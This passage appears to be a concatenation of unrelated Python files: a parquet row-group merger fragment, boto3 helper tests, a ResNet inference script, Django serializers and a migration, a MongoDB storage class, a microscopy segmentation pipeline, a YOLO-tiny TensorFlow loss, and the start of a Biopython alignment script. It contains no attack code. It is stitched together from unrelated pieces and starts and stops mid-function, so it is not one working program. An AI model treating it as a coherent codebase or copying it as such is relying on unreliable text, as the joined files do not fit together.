                    split_row_groups
                )
            else:
                return False

        def _check_chunksize_criteria(stat, next_stat):
            # True when the merged byte size stays within chunksize.
            if use_chunksize_criteria:
                return (
                    next_stat["total_byte_size"] + stat["total_byte_size"]
                ) <= chunksize
            else:
                return False

        # Default to one row-group per part when the count is missing.
        stat["num-row-groups"] = stat.get("num-row-groups", 1)
        next_stat["num-row-groups"] = next_stat.get("num-row-groups", 1)

        if (same_path or multi_path_allowed) and (
            (
                _check_row_group_criteria(stat, next_stat)
                or _check_chunksize_criteria(stat, next_stat)
            )
        ):
            # Update part list
            next_part.append(part)

            # Update Statistics
            next_stat["total_byte_size"] += stat["total_byte_size"]
            next_stat["num-rows"] += stat["num-rows"]
            next_stat["num-row-groups"] += stat["num-row-groups"]
            for col, col_add in zip(next_stat["columns"], stat["columns"]):
                if col["name"] != col_add["name"]:
                    raise ValueError("Columns are different!!")
                if "min" in col:
                    col["min"] = min(col["min"], col_add["min"])
                if "max" in col:
                    col["max"] = max(col["max"], col_add["max"])
        else:
            # Merge criteria failed: flush the candidate and start a new one.
            parts_agg.append(next_part)
            stats_agg.append(next_stat)
            next_part, next_stat = [part.copy()], stat.copy()

    # Flush the final candidate.
    parts_agg.append(next_part)
    stats_agg.append(next_stat)

    return parts_agg, stats_agg
# Keep the DataFrame method's docstring in sync with the module-level function.
DataFrame.to_parquet.__doc__ = to_parquet.__doc__
|
from unittest import TestCase
from boto3_utils import (
dict_to_key_value,
key_value_to_dict,
snake_to_camel_case,
make_tag_dict,
)
class TestSnakeToCamelCase(TestCase):
    """Test Suite for snake_to_camel_case function."""

    def setUp(self):
        # Known irregular conversions that should be returned verbatim
        # instead of being computed.
        self.answers = {'http_response':'HTTPResponse'}

    def test_name_cidr_block(self):
        self.assertEqual(
            snake_to_camel_case('cidr_block'),
            'CidrBlock'
        )

    def test_name_http_response(self):
        # this tests a short circuit of answers.
        self.assertEqual(
            snake_to_camel_case('http_response', answers=self.answers),
            'HTTPResponse'
        )

    def test_name_vpc_id(self):
        self.assertEqual(
            snake_to_camel_case('vpc_id'),
            'VpcId'
        )
class TestMakeTagDict(TestCase):
    """Test suite for make_tag_dict (AWS tag-list to plain dict)."""

    def setUp(self):
        class TestSubject(object):
            # Mimics an object exposing a boto3-style `.tags` attribute.
            tags = [
                {'Key': 'Name', 'Value': 'myapp01-web01'},
                {'Key': 'role', 'Value': 'web'},
            ]
        self.test_obj = TestSubject

    def test_make_tag_dict(self):
        result = make_tag_dict(self.test_obj.tags)
        for key, expected in (('Name', 'myapp01-web01'), ('role', 'web')):
            self.assertIn(key, result)
            self.assertEqual(result[key], expected)
class TestDictToKeyValue(TestCase):
    """Test suite for the dict_to_key_value / key_value_to_dict helpers."""

    def test_dict_to_key_value(self):
        source = {'key1': 'value1', 'key2': 'value2'}
        # Default separators: "key=value" pairs joined by a single comma.
        rendered = dict_to_key_value(source)
        for pair in ('key1=value1', 'key2=value2'):
            self.assertIn(pair, rendered)
        self.assertEqual(rendered.count(','), 1)
        # With 'x' as both separators, two pairs contain exactly three 'x'.
        not_as_pretty = dict_to_key_value(source, 'x', 'x')
        self.assertEqual(not_as_pretty.count('x'), 3)

    def test_key_value_to_dict(self):
        packed = ['a=1,b=2', 'c=3, d=4', 'e=5']
        expected = {'a': '1', 'b': '2', 'c': '3', 'd': '4', 'e': '5'}
        self.assertEqual(key_value_to_dict(packed), expected)
|
import torch
import torch.nn as nn
import os
from torch.autograd import Variable
import argparse
from model.resnet import resnet101
from dataset.My_Test import MyTest
# Command-line configuration for this inference script.
parser = argparse.ArgumentParser()
parser.add_argument('--num_workers', type=int, default=2)
parser.add_argument('--batchSize', type=int, default=8)
parser.add_argument('--epochs', type=int, default=1, help='number of epochs to train for')
parser.add_argument('--lr', type=float, default=0.0002, help='learning rate, default=0.0002')
parser.add_argument('--gpu', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
opt = parser.parse_args()

# Restrict which GPUs CUDA can see before any CUDA context is created.
os.environ["CUDA_VISIBLE_DEVICES"] = opt.gpu

# Test-time dataset/loader; shuffle=False keeps predictions in file order.
test_set = MyTest('./data/MyImage/', transform=True, test=True)
test_loader = torch.utils.data.DataLoader(test_set, batch_size=opt.batchSize, shuffle=False, num_workers=opt.num_workers)

# ResNet-101 with a 2-class head, restored from the checkpoint and set to
# eval mode for inference.
# NOTE(review): all of this (including argparse) runs at import time, which
# prevents importing this module elsewhere — consider moving into main().
model = resnet101(pretrained=True)
model.fc = nn.Linear(2048, 2)
model.load_state_dict(torch.load('./ckp/model.pth'))
model.cuda()
model.eval()
def main():
    """Run the model over the test loader and print per-batch predictions."""
    with torch.no_grad():
        for image in test_loader:
            # torch.autograd.Variable is deprecated (a no-op) since
            # PyTorch 0.4 — moving the tensor to the GPU is sufficient.
            image = image.cuda()
            out = model(image)
            # Class index with the highest logit for each sample; `.data`
            # access is unnecessary inside torch.no_grad().
            _, predicted = torch.max(out, 1)
            predicted = predicted.cpu().numpy().tolist()
            print(predicted)
# Run inference only when executed as a script.
if __name__ == '__main__':
    main()
|
# Credential placeholders — presumably filled in locally; the consuming
# service cannot be determined from this file alone.
# NOTE(review): keep real values out of version control; prefer loading
# them from environment variables or an untracked local settings file.
USER_NAME = ''
USER_PWD = ''
|
from rest_framework import serializers
from core.models import Category, Article, Comment
from user.serializers import UserSerializer
class CategorySerializer(serializers.ModelSerializer):
    """Serialize Category objects (id, title, slug); id is read-only."""

    class Meta:
        model = Category
        fields = ('id', 'title', 'slug')
        read_only_fields = ('id',)
class AbbreviateCommentSerializer(serializers.ModelSerializer):
    """Compact comment representation with a nested, read-only author."""

    # Nested author representation; never writable through this serializer.
    author = UserSerializer(read_only=True)

    class Meta:
        model = Comment
        fields = ('id', 'body', 'author', 'created_on')
        read_only_fields = ('id', 'author')
class ArticleAddLikeSerializer(serializers.ModelSerializer):
    """Add or remove the requesting user's like on an article instance."""

    class Meta:
        model = Article
        fields = ('id', 'like')
        read_only_fields = ('id',)

    def save(self):
        # The view supplies the liking user as the sole entry of `like`.
        user = self.validated_data.get('like')[0]
        request = self.context.get('request')
        if request.method == 'DELETE':
            # RelatedManager.remove()/add() both return None, so callers
            # receive None from either branch.
            return self.instance.like.remove(user)
        self.instance.like.add(user)
class ArticleSerializer(serializers.ModelSerializer):
    """Flat Article representation used for list/create endpoints."""

    class Meta:
        model = Article
        fields = ('id', 'title', 'description', 'slug', 'owner', 'categories', 'publish_date', 'like')
        read_only_fields = ('id', 'owner')
class ArticleDetailSerializer(serializers.ModelSerializer):
    """Detail Article representation with nested categories and comments."""

    # Read-only nested representations for the detail view.
    categories = CategorySerializer(many=True, read_only=True)
    comments = AbbreviateCommentSerializer(many=True, read_only=True)

    class Meta:
        model = Article
        fields = ('id', 'title', 'description', 'slug', 'owner', 'categories', 'publish_date', 'comments', 'like')
        read_only_fields = ('id', 'owner')
class CommentSerializer(serializers.ModelSerializer):
    """Flat Comment representation used for create/list endpoints."""

    class Meta:
        model = Comment
        fields = ('id', 'article', 'body', 'author', 'created_on')
        read_only_fields = ('id', 'author')
class CommentDetailSerializer(CommentSerializer):
    """Comment detail view: nests the full article and the author."""

    article = ArticleDetailSerializer(read_only=True)
    author = UserSerializer(read_only=True)
class ArticleImageSerializer(serializers.ModelSerializer):
    """Serializer used solely for uploading/updating an article's image."""

    class Meta:
        model = Article
        fields = ('id', 'image')
        read_only_fields = ('id',)
|
# -*- coding: utf-8 -*-
__author__ = 'Meanwhile'
import pymongo
import Constants
# Creates and uses the 'vk_parser' database.
# loc : [ <longitude> , <latitude> ]
# TODO: create an index on the date field.
class ProvaderStorage:
    """MongoDB-backed storage for geo-tagged points in the 'vk_parser' database.

    Documents have the shape {"loc": [<longitude>, <latitude>], "date": <date>}.
    """

    def __init__(self):
        # Connection parameters come from the project-wide Constants module.
        self.client = pymongo.MongoClient(Constants.Constants.getMongoServer(),
                                          Constants.Constants.getMongoPort())
        self.db = self.client['vk_parser'];

    def searchByDate(self, collection, date):
        """Return a cursor over documents in `collection` with the given date."""
        return self.db[collection].find({"date": date})

    def add(self, collection, lat, lng, date):
        """Insert one point; note the [lng, lat] order in the stored document."""
        # NOTE(review): Collection.insert() is deprecated in pymongo>=3
        # (use insert_one) — confirm which pymongo version the project pins.
        self.db[collection].insert({
            "loc": [lng, lat],
            "date": date
        })

    def findAll(self, collection):
        """Return a cursor over all documents in `collection`."""
        return self.db[collection].find()

    def deleteCollections(self, collection):
        """Delete all documents from the chosen collection.

        :param collection: collection name
        :type collection: string
        """
        # NOTE(review): Collection.remove() is deprecated in pymongo>=3
        # (use delete_many) — confirm the pymongo version.
        self.db[collection].remove()
|
import logging
import pathlib
from types import SimpleNamespace
import click
import parse
import dtoolcore
import skimage.measure
import pandas as pd
from dtoolbioimage import Image as dbiImage
from fishtools.config import Config
from fishtools.data import DataLoader, get_specs
from fishtools.segment import segmentation_from_nuclear_channel_and_markers, segmentation_from_cellmask_and_label_image, scale_segmentation, filter_segmentation_by_region_list
from fishtools.vis import visualise_counts
from fishtools.probes import get_counts_by_cell
# Module-level logger shared by all fishtools pipeline steps below.
logger = logging.getLogger("fishtools")
def get_filtered_segmentation(dataitem, params):
    """Segment cells for one data item and keep only regions marked "good".

    Builds a nuclear label image, derives a cell segmentation from it and
    the cell mask, then filters the segmentation down to the regions whose
    labels lie under annotated "good" points.
    """
    nuc_label_image = segmentation_from_nuclear_channel_and_markers(
        dataitem.fishimage,
        skimage.measure.label(dataitem.scaled_markers),
        params
    )
    # NOTE(review): debug image written to the working directory on every
    # call — consider removing or gating behind a verbosity flag.
    nuc_label_image.pretty_color_image.view(dbiImage).save("nuc_label_img.png")

    segmentation = segmentation_from_cellmask_and_label_image(
        dataitem.cell_mask(params),
        nuc_label_image
    )

    # Map each annotated "good" point to the segmentation label under its
    # centroid, then keep only those labelled regions.
    scaled_good_mask = scale_segmentation(dataitem.good_mask, dataitem.maxproj)
    labelled_points = skimage.measure.label(scaled_good_mask)
    rprops = skimage.measure.regionprops(labelled_points)
    region_centroids = [r.centroid for r in rprops]
    icentroids = [(int(r), int(c)) for r, c in region_centroids]
    good_regions = [segmentation[r, c] for r, c in icentroids]
    filtered_segmentation = filter_segmentation_by_region_list(
        segmentation,
        good_regions
    )
    return filtered_segmentation
def process_dataitem(dataitem, spec, params, config, output_ds):
    """Process one data item: save a visualisation and per-cell measurements.

    Writes a counts-visualisation PNG and a per-cell CSV (label, pixel
    area, probe count) into ``output_ds``, and returns the measurements
    as a pandas DataFrame.
    """
    probe_locs = dataitem.probe_locs_2d(params.probethresh)
    filtered_segmentation = get_filtered_segmentation(dataitem, params)

    vis = visualise_counts(
        dataitem.maxproj,
        filtered_segmentation,
        probe_locs
    )
    # FIXME
    output_fname = "vis{expid}.png".format(**spec)
    image_abspath = output_ds.prepare_staging_abspath_promise(f"images/{output_fname}")
    vis.save(image_abspath)

    # Pixel area for each segmented cell label.
    areas_by_cell = {
        l: int(filtered_segmentation.rprops[l].area)
        for l in filtered_segmentation.labels
    }
    counts_by_cell = get_counts_by_cell(filtered_segmentation, probe_locs)
    measurements = [
        {
            "label": l,
            "pixelarea": areas_by_cell[l],
            "probecount": counts_by_cell[l]
        }
        for l in areas_by_cell
    ]
    df = pd.DataFrame(measurements)

    # FIXME
    csv_output_fname = "results{expid}.csv".format(**spec)
    csv_abspath = output_ds.prepare_staging_abspath_promise(f"csv/{csv_output_fname}")
    df.to_csv(csv_abspath, index=False)

    return df
def diagnostics(dataitem, spec, config, params):
    """Ad-hoc debugging helper: dump intermediate images for one data item.

    Writes several PNGs (nuclear/cell mask, annotation crops, marker
    overlay) into the current working directory. Not part of the normal
    pipeline flow.
    """
    import os
    import numpy as np
    from fishtools.segment import nuc_cell_mask_from_fishimage
    import skimage.measure
    from dtoolbioimage import scale_to_uint8

    ncm = nuc_cell_mask_from_fishimage(dataitem.fishimage, params)
    ncm.view(dbiImage).save("ncm.png")

    # NOTE(review): this template repeats {expid} twice — presumably one
    # placeholder was meant to be a different field (compare the "good"
    # template below). Confirm against the annotation file naming scheme.
    template = "{expid}-{expid}.png"
    # template = "{expid}-good.png"
    fname = template.format(**spec)
    fpath = os.path.join(config.annotation_dirpath, fname)
    im = dbiImage.from_file(fpath)

    # template = "{expid}-{expid}.png"
    template = "{expid}-good.png"
    fname = template.format(**spec)
    fpath = os.path.join(config.annotation_dirpath, fname)
    imgood = dbiImage.from_file(fpath)

    im.save("floop.png")
    print(im[0, 0, :])
    print(im[480, 360, :])

    # Bounding box of the fully-opaque (alpha == 255) region of the
    # annotation image, used to crop the "good" annotation.
    regionim = (im[:,:,3] == 255)
    r = skimage.measure.regionprops(skimage.measure.label(regionim))[0]
    rmin, cmin, rmax, cmax = r.bbox
    sliceme = np.s_[rmin:rmax,cmin:cmax]
    imgood[sliceme].save("SLIGAES.png")

    dataitem.scaled_markers.view(dbiImage).save("scaled_markers.png")

    # Overlay marker pixels in green on the max projection.
    rdim, cdim = dataitem.maxproj.shape
    canvas = np.dstack(3 * [scale_to_uint8(dataitem.maxproj)])
    canvas[np.where(dataitem.scaled_markers)] = 0, 255, 0
    canvas.view(dbiImage).save("canvas.png")
@click.command()
@click.argument('config_fpath')
def main(config_fpath):
    """Process every spec in the config, writing images/CSVs and a summary
    CSV into a newly created output dataset."""
    logging.basicConfig(level=logging.INFO)
    config = Config(config_fpath)
    params = SimpleNamespace(**config.params)
    # NOTE(review): `dl` is not used below; kept because DataLoader.__init__
    # may validate/load the raw config — confirm before removing.
    dl = DataLoader(config.raw_config)
    specs = get_specs(config)

    from fishtools.data import load_multiannotation_di

    readme_str = config.as_readme_format()

    dfs = []
    with dtoolcore.DataSetCreator(
        config.output_name,
        config.output_base_uri
    ) as output_ds:
        for spec in specs:
            # FIXME: the message labels the value "n=" but formats expid.
            logger.info("Processing n={expid}".format(**spec))
            try:
                # FIXME - naming!
                dataitem = load_multiannotation_di(config, spec)
                df = process_dataitem(dataitem, spec, params, config, output_ds)
                df['expid'] = spec['expid']
                dfs.append(df)
            except FileNotFoundError as err:
                # Missing inputs for one spec are skipped, not fatal.
                logger.warning(f"Couldn't load: {err}")

        summary_output_abspath = output_ds.prepare_staging_abspath_promise("summary.csv")
        pd.concat(dfs).to_csv(summary_output_abspath, index=False)
        output_ds.put_readme(readme_str)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-27 11:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the ``type`` choice field to the ``channel`` model (utils app)."""

    dependencies = [
        ('utils', '0008_auto_20160524_1436'),
    ]

    operations = [
        migrations.AddField(
            model_name='channel',
            name='type',
            field=models.CharField(
                choices=[
                    (b'WEATHER_STATION', b'Weather Station'),
                    (b'RIVER_DEPTH', b'River Depth'),
                    (b'RAINFALL_TEMP', b'Rainfall and Temp'),
                    (b'DEPTH_TEMP', b'River Depth and Temp'),
                ],
                default=b'Weather Station',
                max_length=50,
            ),
        ),
    ]
|
import ResModel
import tensorflow as tf
import numpy as np
import re
from yolo.net.net import Net
class YoloTinyNet(Net):
    """YOLO "tiny" detection network whose convolutional backbone has been
    replaced by a ResNet (see the #ChangeStart / #ChangeENd markers).

    NOTE(review): this code targets a pre-1.0 TensorFlow API
    (``tf.pack``, ``tf.concat(axis, values)``, ``keep_dims=``); it will not
    run on modern TensorFlow without porting -- confirm the pinned TF version.
    """

    def __init__(self, common_params, net_params, test=False):
        """
        Args:
            common_params: a params dict (image_size, num_classes, batch_size).
            net_params: a params dict (cell_size, boxes_per_cell, weight_decay
                and, when training, the four loss scale factors).
            test: when True, the loss scale params are not read.
        """
        super(YoloTinyNet, self).__init__(common_params, net_params)
        # process params
        self.image_size = int(common_params['image_size'])
        self.num_classes = int(common_params['num_classes'])
        self.cell_size = int(net_params['cell_size'])
        self.boxes_per_cell = int(net_params['boxes_per_cell'])
        self.batch_size = int(common_params['batch_size'])
        self.weight_decay = float(net_params['weight_decay'])

        if not test:
            # Loss weighting factors, only needed for training.
            self.object_scale = float(net_params['object_scale'])
            self.noobject_scale = float(net_params['noobject_scale'])
            self.class_scale = float(net_params['class_scale'])
            self.coord_scale = float(net_params['coord_scale'])

    def inference(self, images):
        """Build the yolo model.

        Args:
            images: 4-D tensor [batch_size, image_height, image_width, channels]
        Returns:
            predicts: 4-D tensor
                [batch_size, cell_size, cell_size, num_classes + 5 * boxes_per_cell]
        """
        #ChangeStart
        # Original tiny-YOLO convolutional stack, kept for reference; the
        # backbone is now ResModel.resnet below.
        '''
        conv_num = 1
        temp_conv = self.conv2d('conv' + str(conv_num), images, [3, 3, 3, 16], stride=1)
        conv_num += 1
        temp_pool = self.max_pool(temp_conv, [2, 2], 2)
        temp_conv = self.conv2d('conv' + str(conv_num), temp_pool, [3, 3, 16, 32], stride=1)
        conv_num += 1
        temp_pool = self.max_pool(temp_conv, [2, 2], 2)
        temp_conv = self.conv2d('conv' + str(conv_num), temp_pool, [3, 3, 32, 64], stride=1)
        conv_num += 1
        temp_conv = self.max_pool(temp_conv, [2, 2], 2)
        temp_conv = self.conv2d('conv' + str(conv_num), temp_conv, [3, 3, 64, 128], stride=1)
        conv_num += 1
        temp_conv = self.max_pool(temp_conv, [2, 2], 2)
        temp_conv = self.conv2d('conv' + str(conv_num), temp_conv, [3, 3, 128, 256], stride=1)
        conv_num += 1
        temp_conv = self.max_pool(temp_conv, [2, 2], 2)
        temp_conv = self.conv2d('conv' + str(conv_num), temp_conv, [3, 3, 256, 512], stride=1)
        conv_num += 1
        temp_conv = self.max_pool(temp_conv, [2, 2], 2)
        temp_conv = self.conv2d('conv' + str(conv_num), temp_conv, [3, 3, 512, 1024], stride=1)
        conv_num += 1
        temp_conv = self.conv2d('conv' + str(conv_num), temp_conv, [3, 3, 1024, 1024], stride=1)
        conv_num += 1
        temp_conv = self.conv2d('conv' + str(conv_num), temp_conv, [3, 3, 1024, 1024], stride=1)
        conv_num += 1
        '''
        temp_conv = ResModel.resnet(images,20)
        #ChangeENd

        # Move axis 3 (channels) to position 1 before flattening for the
        # fully connected layers.
        temp_conv = tf.transpose(temp_conv, (0, 3, 1, 2))

        #Fully connected layer
        '''
        print 'delete Fully'
        local2 = self.local('local2', temp_conv,self.cell_size * self.cell_size * 1024, 4096)
        '''
        local1 = self.local('local1', temp_conv, self.cell_size * self.cell_size * 1024, 2048)
        local2 = self.local('local2', local1, 2048, 4096)
        local3 = self.local('local3', local2, 4096, self.cell_size * self.cell_size * (self.num_classes + self.boxes_per_cell * 5), leaky=False, pretrain=False, train=True)

        # Split the flat prediction vector into class probabilities, box
        # confidence scales and box coordinates, then concat channel-last.
        n1 = self.cell_size * self.cell_size * self.num_classes
        n2 = n1 + self.cell_size * self.cell_size * self.boxes_per_cell

        class_probs = tf.reshape(local3[:, 0:n1], (-1, self.cell_size, self.cell_size, self.num_classes))
        scales = tf.reshape(local3[:, n1:n2], (-1, self.cell_size, self.cell_size, self.boxes_per_cell))
        boxes = tf.reshape(local3[:, n2:], (-1, self.cell_size, self.cell_size, self.boxes_per_cell * 4))

        local3 = tf.concat(3,[class_probs, scales, boxes])

        predicts = local3

        return predicts

    def iou(self, boxes1, boxes2):
        """calculate ious
        Args:
          boxes1: 4-D tensor [CELL_SIZE, CELL_SIZE, BOXES_PER_CELL, 4] ====> (x_center, y_center, w, h)
          boxes2: 1-D tensor [4] ===> (x_center, y_center, w, h)
        Return:
          iou: 3-D tensor [CELL_SIZE, CELL_SIZE, BOXES_PER_CELL]
        """
        # Convert both box sets from (cx, cy, w, h) to corner form
        # (x_min, y_min, x_max, y_max).
        boxes1 = tf.pack([boxes1[:, :, :, 0] - boxes1[:, :, :, 2] / 2, boxes1[:, :, :, 1] - boxes1[:, :, :, 3] / 2,
                          boxes1[:, :, :, 0] + boxes1[:, :, :, 2] / 2, boxes1[:, :, :, 1] + boxes1[:, :, :, 3] / 2])
        boxes1 = tf.transpose(boxes1, [1, 2, 3, 0])
        boxes2 = tf.pack([boxes2[0] - boxes2[2] / 2, boxes2[1] - boxes2[3] / 2,
                          boxes2[0] + boxes2[2] / 2, boxes2[1] + boxes2[3] / 2])

        #calculate the left up point
        lu = tf.maximum(boxes1[:, :, :, 0:2], boxes2[0:2])
        rd = tf.minimum(boxes1[:, :, :, 2:], boxes2[2:])

        #intersection
        intersection = rd - lu

        inter_square = intersection[:, :, :, 0] * intersection[:, :, :, 1]

        # Zero out pairs with no overlap (negative extents in either axis).
        mask = tf.cast(intersection[:, :, :, 0] > 0, tf.float32) * tf.cast(intersection[:, :, :, 1] > 0, tf.float32)

        inter_square = mask * inter_square

        #calculate the boxs1 square and boxs2 square
        square1 = (boxes1[:, :, :, 2] - boxes1[:, :, :, 0]) * (boxes1[:, :, :, 3] - boxes1[:, :, :, 1])
        square2 = (boxes2[2] - boxes2[0]) * (boxes2[3] - boxes2[1])

        # Epsilon guards against division by zero for degenerate boxes.
        return inter_square/(square1 + square2 - inter_square + 1e-6)

    def cond1(self, num, object_num, loss, predict, label, nilboy):
        """Loop condition for tf.while_loop: continue while num < object_num."""
        return num < object_num

    def body1(self, num, object_num, loss, predict, labels, nilboy):
        """Accumulate the loss contribution of object ``num``.

        Args:
          predict: 3-D tensor [cell_size, cell_size, 5 * boxes_per_cell]
          labels : [max_objects, 5]  (x_center, y_center, w, h, class)
        """
        label = labels[num:num+1, :]
        label = tf.reshape(label, [-1])

        #calculate objects tensor [CELL_SIZE, CELL_SIZE]
        # Cell-grid extent covered by the ground-truth box.
        min_x = (label[0] - label[2] / 2) / (self.image_size / self.cell_size)
        max_x = (label[0] + label[2] / 2) / (self.image_size / self.cell_size)
        min_y = (label[1] - label[3] / 2) / (self.image_size / self.cell_size)
        max_y = (label[1] + label[3] / 2) / (self.image_size / self.cell_size)

        min_x = tf.floor(min_x)
        min_y = tf.floor(min_y)

        max_x = tf.ceil(max_x)
        max_y = tf.ceil(max_y)

        # Ones over the covered cells, zero-padded out to the full grid.
        temp = tf.cast(tf.pack([max_y - min_y, max_x - min_x]), dtype=tf.int32)
        objects = tf.ones(temp, tf.float32)

        temp = tf.cast(tf.pack([min_y, self.cell_size - max_y, min_x, self.cell_size - max_x]), tf.int32)
        temp = tf.reshape(temp, (2, 2))
        objects = tf.pad(objects, temp, "CONSTANT")

        #calculate objects tensor [CELL_SIZE, CELL_SIZE]
        #calculate responsible tensor [CELL_SIZE, CELL_SIZE]
        # Single responsible cell: the one containing the box center.
        center_x = label[0] / (self.image_size / self.cell_size)
        center_x = tf.floor(center_x)

        center_y = label[1] / (self.image_size / self.cell_size)
        center_y = tf.floor(center_y)

        response = tf.ones([1, 1], tf.float32)

        temp = tf.cast(tf.pack([center_y, self.cell_size - center_y - 1, center_x, self.cell_size -center_x - 1]), tf.int32)
        temp = tf.reshape(temp, (2, 2))
        response = tf.pad(response, temp, "CONSTANT")
        #objects = response

        #calculate iou_predict_truth [CELL_SIZE, CELL_SIZE, BOXES_PER_CELL]
        predict_boxes = predict[:, :, self.num_classes + self.boxes_per_cell:]

        predict_boxes = tf.reshape(predict_boxes, [self.cell_size, self.cell_size, self.boxes_per_cell, 4])

        # Predicted offsets are cell-relative; scale back to pixel units.
        predict_boxes = predict_boxes * [self.image_size / self.cell_size, self.image_size / self.cell_size, self.image_size, self.image_size]

        base_boxes = np.zeros([self.cell_size, self.cell_size, 4])

        for y in range(self.cell_size):
            for x in range(self.cell_size):
                #nilboy
                base_boxes[y, x, :] = [self.image_size / self.cell_size * x, self.image_size / self.cell_size * y, 0, 0]
        base_boxes = np.tile(np.resize(base_boxes, [self.cell_size, self.cell_size, 1, 4]), [1, 1, self.boxes_per_cell, 1])

        predict_boxes = base_boxes + predict_boxes

        iou_predict_truth = self.iou(predict_boxes, label[0:4])
        #calculate C [cell_size, cell_size, boxes_per_cell]
        C = iou_predict_truth * tf.reshape(response, [self.cell_size, self.cell_size, 1])

        #calculate I tensor [CELL_SIZE, CELL_SIZE, BOXES_PER_CELL]
        I = iou_predict_truth * tf.reshape(response, (self.cell_size, self.cell_size, 1))

        # I selects, within the responsible cell, the box with the best IoU.
        max_I = tf.reduce_max(I, 2, keep_dims=True)

        I = tf.cast((I >= max_I), tf.float32) * tf.reshape(response, (self.cell_size, self.cell_size, 1))

        #calculate no_I tensor [CELL_SIZE, CELL_SIZE, BOXES_PER_CELL]
        no_I = tf.ones_like(I, dtype=tf.float32) - I

        p_C = predict[:, :, self.num_classes:self.num_classes + self.boxes_per_cell]

        #calculate truth x,y,sqrt_w,sqrt_h 0-D
        x = label[0]
        y = label[1]

        sqrt_w = tf.sqrt(tf.abs(label[2]))
        sqrt_h = tf.sqrt(tf.abs(label[3]))
        #sqrt_w = tf.abs(label[2])
        #sqrt_h = tf.abs(label[3])

        #calculate predict p_x, p_y, p_sqrt_w, p_sqrt_h 3-D [CELL_SIZE, CELL_SIZE, BOXES_PER_CELL]
        p_x = predict_boxes[:, :, :, 0]
        p_y = predict_boxes[:, :, :, 1]

        #p_sqrt_w = tf.sqrt(tf.abs(predict_boxes[:, :, :, 2])) * ((tf.cast(predict_boxes[:, :, :, 2] > 0, tf.float32) * 2) - 1)
        #p_sqrt_h = tf.sqrt(tf.abs(predict_boxes[:, :, :, 3])) * ((tf.cast(predict_boxes[:, :, :, 3] > 0, tf.float32) * 2) - 1)
        #p_sqrt_w = tf.sqrt(tf.maximum(0.0, predict_boxes[:, :, :, 2]))
        #p_sqrt_h = tf.sqrt(tf.maximum(0.0, predict_boxes[:, :, :, 3]))
        #p_sqrt_w = predict_boxes[:, :, :, 2]
        #p_sqrt_h = predict_boxes[:, :, :, 3]
        # Clamp predicted w/h to [0, image_size] before the sqrt.
        p_sqrt_w = tf.sqrt(tf.minimum(self.image_size * 1.0, tf.maximum(0.0, predict_boxes[:, :, :, 2])))
        p_sqrt_h = tf.sqrt(tf.minimum(self.image_size * 1.0, tf.maximum(0.0, predict_boxes[:, :, :, 3])))

        #calculate truth p 1-D tensor [NUM_CLASSES]
        P = tf.one_hot(tf.cast(label[4], tf.int32), self.num_classes, dtype=tf.float32)

        #calculate predict p_P 3-D tensor [CELL_SIZE, CELL_SIZE, NUM_CLASSES]
        p_P = predict[:, :, 0:self.num_classes]

        #class_loss
        class_loss = tf.nn.l2_loss(tf.reshape(objects, (self.cell_size, self.cell_size, 1)) * (p_P - P)) * self.class_scale
        #class_loss = tf.nn.l2_loss(tf.reshape(response, (self.cell_size, self.cell_size, 1)) * (p_P - P)) * self.class_scale

        #object_loss
        object_loss = tf.nn.l2_loss(I * (p_C - C)) * self.object_scale
        #object_loss = tf.nn.l2_loss(I * (p_C - (C + 1.0)/2.0)) * self.object_scale

        #noobject_loss
        #noobject_loss = tf.nn.l2_loss(no_I * (p_C - C)) * self.noobject_scale
        noobject_loss = tf.nn.l2_loss(no_I * (p_C)) * self.noobject_scale

        #coord_loss
        coord_loss = (tf.nn.l2_loss(I * (p_x - x)/(self.image_size/self.cell_size)) +
                      tf.nn.l2_loss(I * (p_y - y)/(self.image_size/self.cell_size)) +
                      tf.nn.l2_loss(I * (p_sqrt_w - sqrt_w))/ self.image_size +
                      tf.nn.l2_loss(I * (p_sqrt_h - sqrt_h))/self.image_size) * self.coord_scale

        nilboy = I

        return num + 1, object_num, [loss[0] + class_loss, loss[1] + object_loss, loss[2] + noobject_loss, loss[3] + coord_loss], predict, labels, nilboy

    def loss(self, predicts, labels, objects_num):
        """Add Loss to all the trainable variables.

        Args:
          predicts: 4-D tensor [batch_size, cell_size, cell_size, 5 * boxes_per_cell]
          ===> (num_classes, boxes_per_cell, 4 * boxes_per_cell)
          labels  : 3-D tensor of [batch_size, max_objects, 5]
          objects_num: 1-D tensor [batch_size]
        """
        class_loss = tf.constant(0, tf.float32)
        object_loss = tf.constant(0, tf.float32)
        noobject_loss = tf.constant(0, tf.float32)
        coord_loss = tf.constant(0, tf.float32)
        loss = [0, 0, 0, 0]
        for i in range(self.batch_size):
            predict = predicts[i, :, :, :]
            label = labels[i, :, :]
            object_num = objects_num[i]
            nilboy = tf.ones([7,7,2])
            # Iterate over the objects of this sample, accumulating the four
            # loss components via body1.
            tuple_results = tf.while_loop(self.cond1, self.body1, [tf.constant(0), object_num, [class_loss, object_loss, noobject_loss, coord_loss], predict, label, nilboy])
            for j in range(4):
                loss[j] = loss[j] + tuple_results[2][j]
            nilboy = tuple_results[5]

        tf.add_to_collection('losses', (loss[0] + loss[1] + loss[2] + loss[3])/self.batch_size)

        tf.summary.scalar('class_loss', loss[0]/self.batch_size)
        tf.summary.scalar('object_loss', loss[1]/self.batch_size)
        tf.summary.scalar('noobject_loss', loss[2]/self.batch_size)
        tf.summary.scalar('coord_loss', loss[3]/self.batch_size)
        # Residual of the losses collection = the weight-decay terms.
        tf.summary.scalar('weight_loss', tf.add_n(tf.get_collection('losses')) - (loss[0] + loss[1] + loss[2] + loss[3])/self.batch_size )

        return tf.add_n(tf.get_collection('losses'), name='total_loss'), nilboy
|
#!python3
import pandas as pd
import numpy as np
import os
from Bio import AlignIO
from Bio.Alphabet.IUPAC import IUPACUnambiguousDNA
from Bio.Data.CodonTable import TranslationError
from ete3 import Tree
# Extract per-gene codon alignments from the Cetacea DATASET_B phylip file,
# keeping only codon columns translatable in every retained taxon, then write
# .ali files and CDS lists filtered by accuracy/coverage thresholds.
f = os.path.abspath('..') + "/DataEmpirical/Cetacea"
phy = AlignIO.read("{0}/datadryad/DATASET_B.phylip".format(f), format="phylip-relaxed", alphabet=IUPACUnambiguousDNA())
print("{0} taxa.".format(len(phy)))
taxa = Tree("{0}/rootedtree.nhx".format(f), format=1).get_leaf_names()
# precision: fraction of the gene's columns kept; coverage: mean non-gap share.
precision_dict = {}
